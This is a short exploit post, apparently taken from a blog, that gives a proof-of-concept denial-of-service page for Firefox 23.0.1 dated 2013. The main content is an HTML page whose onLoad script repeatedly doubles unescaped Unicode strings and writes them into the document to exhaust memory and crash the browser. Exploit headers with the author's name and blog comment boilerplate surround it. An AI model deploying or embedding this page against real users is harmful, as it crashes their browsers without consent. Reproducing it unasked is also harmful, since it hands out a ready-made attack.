# Exploit Title: Mozilla FireFox 23.0.1 - Denial of Service Vulnerability
# Vendor URI: http://www.mozilla.org/en-US/
# Date: 20/8/2013
# Tested on: [ Windows 8]
# Author: Ryuzaki Lawlet / Fahmi Fisal @Justryuz
===========================
<html>
<title>Mozilla FireFox 23.0.1 - Denial Of Service</title>
<head>
<script>
function justryuz()
{
var a1 = unescape("%uaa03%u1001");
var b2 = unescape("%u4870%u1000");
for(i=0; i <= 90 ; ++i)
{
a1+=a1;
b2+=b2;
document.write(a1);
document.write(b2);
}
document.write(a1);
document.write(b2);
}
</script>
<body onLoad="justryuz()">
</body>
</html>
==============
Thanks: TBD, Gaysec, CyberSEC, C4, bo0gle,
Subscribe to:
Post Comments (Atom)
Belum ada tanggapan untuk "Mozilla FireFox 23.0.1 - Denial of Service Vulnerability"
Post a Comment